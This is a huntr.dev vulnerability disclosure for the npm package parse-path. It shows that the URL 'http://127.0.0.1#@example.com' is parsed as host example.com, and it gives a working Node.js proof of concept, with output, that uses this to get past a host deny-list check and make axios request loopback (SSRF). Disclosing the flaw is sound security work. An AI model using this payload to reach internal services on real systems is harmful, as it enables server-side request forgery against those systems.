huntr report AFFFB2BD-FB06-4144-829E-ECBBCBC85388 by r0hansh
History: Feb 14, 2022 - 7:05 p.m.

in ionicabizau/parse-path

2022-02-14 19:05:50
r0hansh
www.huntr.dev

EPSS: 0.001 (Low)
Percentile: 38.1%

Description

parse-path is unable to detect the right resource. While parsing the URL http://127.0.0.1#@example.com, parse-path reports the host/resource as example.com, but the actual resource is 127.0.0.1: the `#` ends the authority, so `@example.com` is part of the fragment, not a userinfo separator.

Proof of Concept

SSRF PoC

const parsePath = require("parse-path");
const axios = require("axios");

const PAYLOAD = "http://127.0.0.1#@example.com";

// parse-path reports "example.com" as the resource for this URL
const parsedData = parsePath(PAYLOAD);

// Naive deny-list check on the host that parse-path reported
if (parsedData.resource !== "127.0.0.1") {
  console.log("BYPASSED...");

  // axios resolves the same string to 127.0.0.1, so the request goes to loopback
  axios.get(PAYLOAD).then(function (resp) {
    console.log("Sent the request to " + resp.request._currentUrl);
  })
  .catch(function (error) {
    console.log("Sent the request to " + error.request._currentUrl);
  });
}

OUTPUT:

BYPASSED...
Sent the request to http://127.0.0.1/

Impact

An attacker can bypass host-validation checks, which can lead to SSRF, open redirect and similar vulnerabilities. The above PoC bypasses the SSRF check because axios loads 127.0.0.1 rather than example.com: the check and the HTTP client parse the same string differently, and the client's interpretation is the one that decides where the connection goes.

